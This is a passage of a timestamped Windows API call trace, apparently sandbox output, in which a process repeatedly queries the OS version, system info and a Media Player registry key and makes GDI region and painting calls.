lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.866] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7904027d [0017.866] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x83040713 [0017.866] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e41 [0017.866] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e42 [0017.866] CombineRgn (hrgnDst=0x1040e41, hrgnSrc1=0x7904027d, hrgnSrc2=0x83040713, iMode=1) returned 1 [0017.866] CombineRgn (hrgnDst=0x1040e42, hrgnSrc1=0x7904027d, hrgnSrc2=0x83040713, iMode=4) returned 2 [0017.866] CreateSolidBrush (color=0xff) returned 0x2100e40 [0017.866] CreateSolidBrush (color=0xff0000) returned 0x1100e43 [0017.866] DeleteObject (ho=0x1100e43) returned 1 [0017.866] DeleteObject (ho=0x83040713) returned 1 [0017.866] DeleteObject (ho=0x7904027d) returned 1 [0017.866] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.866] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.866] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.866] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.866] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.867] BeginPath (hdc=0x0) returned 0 [0017.867] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.867] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.867] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.867] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.867] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.867] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.867] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.867] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.867] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x84040713 [0017.867] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7a04027d [0017.867] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e44 [0017.867] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e45 [0017.867] CombineRgn (hrgnDst=0x1040e44, hrgnSrc1=0x84040713, hrgnSrc2=0x7a04027d, iMode=1) returned 1 [0017.867] CombineRgn (hrgnDst=0x1040e45, hrgnSrc1=0x84040713, hrgnSrc2=0x7a04027d, iMode=4) returned 2 [0017.867] CreateSolidBrush (color=0xff) returned 0x2100e43 [0017.867] CreateSolidBrush (color=0xff0000) returned 0x1100e46 [0017.867] DeleteObject (ho=0x1100e46) returned 1 [0017.867] DeleteObject (ho=0x7a04027d) returned 1 [0017.867] DeleteObject (ho=0x84040713) returned 1 [0017.867] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.867] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.867] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.867] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.867] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.867] BeginPath (hdc=0x0) returned 0 [0017.867] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.867] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.867] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.868] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.868] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.868] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.868] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.868] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.868] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7b04027d [0017.868] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x85040713 [0017.868] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e47 [0017.868] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e48 [0017.868] CombineRgn (hrgnDst=0x1040e47, hrgnSrc1=0x7b04027d, hrgnSrc2=0x85040713, iMode=1) returned 1 [0017.868] CombineRgn (hrgnDst=0x1040e48, hrgnSrc1=0x7b04027d, hrgnSrc2=0x85040713, iMode=4) returned 2 [0017.868] CreateSolidBrush (color=0xff) returned 0x2100e46 [0017.868] CreateSolidBrush (color=0xff0000) returned 0x1100e49 [0017.868] DeleteObject (ho=0x1100e49) returned 1 [0017.868] DeleteObject (ho=0x85040713) returned 1 [0017.868] DeleteObject (ho=0x7b04027d) returned 1 [0017.868] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.868] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.868] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.868] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.868] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.868] BeginPath (hdc=0x0) returned 0 [0017.868] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.868] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.868] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.868] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.868] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.868] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.869] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.869] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.869] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x86040713 [0017.869] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7c04027d [0017.869] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e4a [0017.869] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e4b [0017.869] CombineRgn (hrgnDst=0x1040e4a, hrgnSrc1=0x86040713, hrgnSrc2=0x7c04027d, iMode=1) returned 1 [0017.869] CombineRgn (hrgnDst=0x1040e4b, hrgnSrc1=0x86040713, hrgnSrc2=0x7c04027d, iMode=4) returned 2 [0017.869] CreateSolidBrush (color=0xff) returned 0x2100e49 [0017.869] CreateSolidBrush (color=0xff0000) returned 0x1100e4c [0017.869] DeleteObject (ho=0x1100e4c) returned 1 [0017.869] DeleteObject (ho=0x7c04027d) returned 1 [0017.869] DeleteObject (ho=0x86040713) returned 1 [0017.869] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.869] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.869] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.869] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.869] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.869] BeginPath (hdc=0x0) returned 0 [0017.869] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.869] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.869] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.869] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.869] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.869] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.869] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.869] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.870] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7d04027d [0017.870] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x87040713 [0017.870] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e4d [0017.870] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e4e [0017.870] CombineRgn (hrgnDst=0x1040e4d, hrgnSrc1=0x7d04027d, hrgnSrc2=0x87040713, iMode=1) returned 1 [0017.870] CombineRgn (hrgnDst=0x1040e4e, hrgnSrc1=0x7d04027d, hrgnSrc2=0x87040713, iMode=4) returned 2 [0017.870] CreateSolidBrush (color=0xff) returned 0x2100e4c [0017.870] CreateSolidBrush (color=0xff0000) returned 0x1100e4f [0017.870] DeleteObject (ho=0x1100e4f) returned 1 [0017.870] DeleteObject (ho=0x87040713) returned 1 [0017.870] DeleteObject (ho=0x7d04027d) returned 1 [0017.870] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.870] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.870] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.870] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.870] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.870] BeginPath (hdc=0x0) returned 0 [0017.870] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.870] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.870] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.870] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.870] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.870] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.870] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.870] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.871] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x88040713 [0017.871] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7e04027d [0017.871] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e50 [0017.871] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e51 [0017.871] CombineRgn (hrgnDst=0x1040e50, hrgnSrc1=0x88040713, hrgnSrc2=0x7e04027d, iMode=1) returned 1 [0017.871] CombineRgn (hrgnDst=0x1040e51, hrgnSrc1=0x88040713, hrgnSrc2=0x7e04027d, iMode=4) returned 2 [0017.871] CreateSolidBrush (color=0xff) returned 0x2100e4f [0017.871] CreateSolidBrush (color=0xff0000) returned 0x1100e52 [0017.871] DeleteObject (ho=0x1100e52) returned 1 [0017.871] DeleteObject (ho=0x7e04027d) returned 1 [0017.871] DeleteObject (ho=0x88040713) returned 1 [0017.871] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.871] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.871] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.871] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.871] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.871] BeginPath (hdc=0x0) returned 0 [0017.871] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.871] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.871] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.871] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.871] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.871] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.871] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.871] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.871] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7f04027d [0017.871] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x89040713 [0017.871] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e53 [0017.871] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e54 [0017.872] CombineRgn (hrgnDst=0x1040e53, hrgnSrc1=0x7f04027d, hrgnSrc2=0x89040713, iMode=1) returned 1 [0017.872] CombineRgn (hrgnDst=0x1040e54, hrgnSrc1=0x7f04027d, hrgnSrc2=0x89040713, iMode=4) returned 2 [0017.872] CreateSolidBrush (color=0xff) returned 0x2100e52 [0017.872] CreateSolidBrush (color=0xff0000) returned 0x1100e55 [0017.872] DeleteObject (ho=0x1100e55) returned 1 [0017.872] DeleteObject (ho=0x89040713) returned 1 [0017.872] DeleteObject (ho=0x7f04027d) returned 1 [0017.872] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.872] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.872] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.872] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.872] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.872] BeginPath (hdc=0x0) returned 0 [0017.872] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.872] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.872] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.872] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.872] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.872] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.872] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.872] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.872] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8a040713 [0017.872] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8004027d [0017.872] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e56 [0017.872] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e57 [0017.872] CombineRgn (hrgnDst=0x1040e56, hrgnSrc1=0x8a040713, hrgnSrc2=0x8004027d, iMode=1) returned 1 [0017.872] CombineRgn (hrgnDst=0x1040e57, hrgnSrc1=0x8a040713, hrgnSrc2=0x8004027d, iMode=4) returned 2 [0017.872] CreateSolidBrush (color=0xff) returned 0x2100e55 [0017.872] CreateSolidBrush (color=0xff0000) returned 0x1100e58 [0017.873] DeleteObject (ho=0x1100e58) returned 1 [0017.873] DeleteObject (ho=0x8004027d) returned 1 [0017.873] DeleteObject (ho=0x8a040713) returned 1 [0017.873] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.873] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.873] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.873] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.873] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.873] BeginPath (hdc=0x0) returned 0 [0017.873] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.873] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.873] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.873] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.873] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.873] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.873] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.873] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.873] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8104027d [0017.873] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8b040713 [0017.873] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e59 [0017.873] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e5a [0017.873] CombineRgn (hrgnDst=0x1040e59, hrgnSrc1=0x8104027d, hrgnSrc2=0x8b040713, iMode=1) returned 1 [0017.873] CombineRgn (hrgnDst=0x1040e5a, hrgnSrc1=0x8104027d, hrgnSrc2=0x8b040713, iMode=4) returned 2 [0017.873] CreateSolidBrush (color=0xff) returned 0x2100e58 [0017.873] CreateSolidBrush (color=0xff0000) returned 0x1100e5b [0017.874] DeleteObject (ho=0x1100e5b) returned 1 [0017.874] DeleteObject (ho=0x8b040713) returned 1 [0017.874] DeleteObject (ho=0x8104027d) returned 1 [0017.874] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.874] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.874] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.874] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.874] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.874] BeginPath (hdc=0x0) returned 0 [0017.874] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.874] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.874] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.874] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.874] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.874] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.874] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.874] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.874] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8c040713 [0017.874] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8204027d [0017.874] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e5c [0017.874] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e5d [0017.874] CombineRgn (hrgnDst=0x1040e5c, hrgnSrc1=0x8c040713, hrgnSrc2=0x8204027d, iMode=1) returned 1 [0017.874] CombineRgn (hrgnDst=0x1040e5d, hrgnSrc1=0x8c040713, hrgnSrc2=0x8204027d, iMode=4) returned 2 [0017.874] CreateSolidBrush (color=0xff) returned 0x2100e5b [0017.874] CreateSolidBrush (color=0xff0000) returned 0x1100e5e [0017.874] DeleteObject (ho=0x1100e5e) returned 1 [0017.874] DeleteObject (ho=0x8204027d) returned 1 [0017.874] DeleteObject (ho=0x8c040713) returned 1 [0017.875] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, 